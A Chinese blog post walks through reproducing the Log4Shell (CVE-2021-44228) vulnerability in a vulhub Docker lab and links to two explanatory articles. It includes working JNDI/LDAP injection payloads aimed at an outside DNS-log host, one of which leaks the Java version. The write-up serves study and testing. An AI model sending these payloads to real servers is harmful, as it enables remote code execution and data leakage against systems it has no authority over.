关键词搜索

源码搜索 ×
×

复现log4j2漏洞(CVE-2021-44228)

发布2022-09-14浏览975次

详情内容

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

理论知识

讲的都比较详细

[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)_plexming的博客-CSDN博客_漏洞复现流程刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。https://blog.csdn.net/qq_46145027/article/details/124661480从0到1带你深入理解log4j2漏洞https://baijiahao.baidu.com/s?id=1720302213380803056&wfr=spider&for=pc

漏洞复现

一、在服务器上搭建log4j2环境

        cd   vulhub/log4j/CVE-2021-44228        进入目录里

        docker-compose  build        搭建log4j2

        docker-compoes  up  -d        开启环境

        docker-compoes  ps        查看对应的端口

         可以看到端口在8983上,我们到服务器防火墙打开8983

 二、检查是否存在漏洞

      payload        action=${jndi:ldap://0tortx.dnslog.cn}  

        刷新发现有值,则存在漏洞        接着我们再构造payload        action=${jndi:ldap://${sys:java.version}.0tortx.dnslog.cn}  出现

        java版本,则存在命令执行漏洞

 总结:

        log4j2属于是Apache的一个java日志框架,log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:和ldap:是不安全的或者可以允许远程代码执行。影响版本: log4j2.x <= 2.14.1

相关技术文章

点击QQ咨询
开通会员
返回顶部
×
微信扫码支付
微信扫码支付
确定支付下载
请使用微信描二维码支付
×

提示信息

×

选择支付方式

  • 微信支付
  • 支付宝付款
确定支付下载